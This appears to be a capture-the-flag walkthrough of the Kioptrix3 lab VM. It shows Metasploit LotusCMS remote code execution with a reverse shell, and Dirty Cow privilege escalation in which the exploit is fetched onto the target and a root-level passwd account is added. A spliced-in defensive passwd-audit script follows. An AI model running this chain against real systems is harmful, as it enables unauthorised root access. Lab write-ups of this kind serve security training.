a guest
Jan 26th, 2019
Enumeration:
Starting off with a basic nmap scan, and then going on to enumerate versions because there are only two services running: SSH and HTTP.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:53 EST
Nmap scan report for kioptrix3.com (192.168.1.27)
Host is up (0.00024s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B8:ED:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

root@spooky:~# nmap -sT -p 22,80 -A 192.168.1.27
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:53 EST
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for kioptrix3.com (192.168.1.27)
Host is up (0.00030s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:B8:ED:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms kioptrix3.com (192.168.1.27)

User:
After searching for a little while and struggling to gain a foothold, I went back to the beginning and read the blog posts. After reading them I noticed the "Login" page which I had glanced over. After a quick searchsploit lotuscms, I found an RCE vulnerability for Metasploit. We can use "msf" to hop into metasploit, then use "search lotuscms" to get the path to the module. To use it we can do:

msf5 > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) >

Next we need to figure out what we need to supply metasploit with...

msf5 exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host

So it looks like we just need to specify RHOSTS and URI. To do so we can use:

msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.1.27
RHOSTS => 192.168.1.27
msf5 exploit(multi/http/lcms_php_exec) > set URI /index.php?system=Admin
URI => /index.php?system=Admin

And to execute it we need to type exploit!

msf5 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.19:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38247 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (192.168.1.19:4444 -> 192.168.1.27:48904) at 2019-01-26 18:39:57 -0500

meterpreter >

Awesome. We've got a shell; to drop into it we can simply type "shell". While we're at it, we need to figure out who we're running as, what kernel, and what release, for any priv-esc exploits. But first, we should upgrade our shell with:

python -c "import pty; pty.spawn('/bin/bash')"
www-data@Kioptrix3:/home/www/kioptrix3.com$

Perfect, now onto priv esc!

Priv Esc:

www-data@Kioptrix3:/home/www/kioptrix3.com$ uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

www-data@Kioptrix3:/home/www/kioptrix3.com$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
www-data@Kioptrix3:/home/www/kioptrix3.com$

So we're running on quite a dated Linux kernel, which means it's likely that there's a privilege escalation exploit out.

After some googling it looks like the kernel is vulnerable to Dirty Cow, specifically "Pokemon Dirty Cow", CVE-2016-5195. Thanks to FireFart for providing the exploit for us to use. You can check out the exploit on Exploit-DB (https://www.exploit-db.com/exploits/40839). We can wget the raw version on our box:

root@spookysec# wget https://www.exploit-db.com/raw/40839 -O ./dirty.c

Now we need to host the file for Kioptrix3 to download with a SimpleHTTPServer.

root@spookysec# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80...

and back over on Kioptrix3, we can get the file with

www-data@Kioptrix3:/tmp$ wget http://192.168.1.19/dirty.c

and we can compile our exploit with

www-data@Kioptrix3:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt

Make the file executable...

www-data@Kioptrix3:/tmp$ chmod +x dirty

And now execute with...

www-data@Kioptrix3:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root

Complete line:
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash

After that the shell froze up, so let's try SSHing in from our box with

root@spookysec# ssh firefart@192.168.1.27

Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
firefart@Kioptrix3:~# id
uid=0(firefart) gid=0(root) groups=0(root)
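The artifact this PoC leaves behind is a second uid=0 entry in /etc/passwd, with a password hash sitting in the passwd file rather than in /etc/shadow. Below is an added defender-side check (not part of the original writeup) that parses a passwd listing and flags exactly that; the sample passwd content is constructed for the example and includes the "firefart" line shown above.

```python
"""Audit passwd-format text for root-equivalent accounts and misplaced hashes.

Added example, not from the original walkthrough. A scheduled run of
find_suspicious() over the real /etc/passwd would catch the extra uid-0
user that the Dirty Cow PoC above creates.
"""
from typing import Dict, List, Tuple

# Constructed sample: normal entries plus the backdoor line from the writeup.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
"""

# Values in the password field that mean "no hash here" (shadowed or locked).
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> List[Tuple[str, str, int, int, str, str, str]]:
    """Parse passwd lines into (name, pw, uid, gid, gecos, home, shell) tuples."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append((name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def find_suspicious(text: str, expected_root: str = "root") -> List[Dict]:
    """Return one finding per account that is uid 0 (but not root), has an
    empty password field, or carries a hash in /etc/passwd itself."""
    findings = []
    for name, pw, uid, gid, gecos, home, shell in parse_passwd(text):
        reasons = []
        if uid == 0 and name != expected_root:
            reasons.append("uid 0 but not root")
        if pw == "":
            reasons.append("empty password field (no password required)")
        elif pw not in SHADOWED_OR_LOCKED:
            reasons.append("password hash stored in /etc/passwd instead of /etc/shadow")
        if reasons:
            findings.append({"user": name, "uid": uid, "shell": shell, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_PASSWD):
        print(f"{f['user']} (uid {f['uid']}, {f['shell']}): {'; '.join(f['reasons'])}")
```

On a live host, feed it the real file with `find_suspicious(open("/etc/passwd").read())`; a clean system returns an empty list.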
  160.  
And rooted. This one wasn't too bad. However, the difficulty is starting to kick up a little bit! I haven't done a PWK box like this yet, but that's good. PWK duplicates are great, but variety is needed. We need to be aware of lots of scenarios so we know how to handle them in an effective manner :D